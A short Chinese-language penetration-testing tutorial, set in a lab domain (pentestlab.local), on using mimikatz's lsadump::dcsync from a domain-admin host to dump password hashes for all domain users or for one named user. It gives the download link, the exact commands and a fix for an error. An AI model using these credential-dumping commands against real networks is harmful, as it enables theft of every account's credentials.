作用

可以远程导出域控的数据库

条件

拿下的主机权限为域管理员

使用工具

minikatz
下载链接:https://github.com/gentilkiwi/mimikatz/releases

环境

server2008(拿下主机)
server2012(域控)
1.在08上执行,mimikatz.exe “lsadump::dcsync /domain:pentestlab.local/all/csv”,可以看见导出了域内用户散列值
image.png
2.也可以单独导出指定用户的散列值,使用如下命令:mimikatz.exe “lsadump::dcsync /domain:pentestlab.local/user:指定用户名”
image.png

报错解决

1.在抓取密码的时候可能会出现如下报错
image.png
解决方式:重新打开了下cmd再进行操作